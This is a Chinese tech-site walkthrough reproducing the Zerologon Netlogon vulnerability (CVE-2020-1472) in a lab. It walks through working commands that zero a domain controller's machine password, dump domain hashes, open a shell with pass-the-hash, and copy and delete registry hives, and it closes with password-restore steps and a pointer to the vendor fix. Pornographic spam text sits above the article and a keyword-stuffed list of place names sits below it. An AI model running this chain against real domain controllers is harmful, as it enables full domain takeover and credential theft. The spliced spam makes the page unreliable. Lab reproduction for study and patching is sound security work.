亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Netlogon特權提升漏洞CVE 2020-1472該如何復習

發布時間:2021-12-28 17:18:35 來源:億速云 閱讀:133 作者:柒染 欄目:安全技術

Netlogon特權提升漏洞CVE 2020-1472該如何復習,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

1.復現環境

DC:
os:windows 2012 server
ip:192.168.236.132

攻擊機:
os:kali
ip:192.168.236.130

2.影響版本

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3.域控環境搭建參考文章

sectool/251828.html

4.復現過程

4.1 漏洞驗證

POC鏈接

Netlogon特權提升漏洞CVE 2020-1472該如何復習

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2 漏洞利用

安裝最新的Impacket,否則會報錯

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.1 下載攻擊exp

EXP下載

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.2 置空密碼

python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.3 獲取hash

進入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.4 獲取shell

python3 wmiexec.py -hashes <HASH> DOMAIN/administrator\@IP

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.5 獲取原hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

4.2.7 恢復hash

恢復鏈接

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.8 驗證是否恢復

使用獲取hash的命令來驗證是否恢復

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

Netlogon特權提升漏洞CVE 2020-1472該如何復習

5.修復建議

官方修復建議

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

余江县| 襄汾县| 称多县| 磴口县| 龙门县| 公主岭市| 云和县| 黔西| 常宁市| 高雄县| 凭祥市| 太湖县| 六盘水市| 泰顺县| 民权县| 习水县| 日土县| 鄂伦春自治旗| 南溪县| 浏阳市| 吉隆县| 石泉县| 青河县| 新竹市| 柏乡县| 礼泉县| 个旧市| 淮南市| 灵寿县| 牟定县| 舟山市| 贵南县| 永新县| 澎湖县| 凤台县| 杂多县| 温州市| 禹州市| 北川| 徐汇区| 荣成市|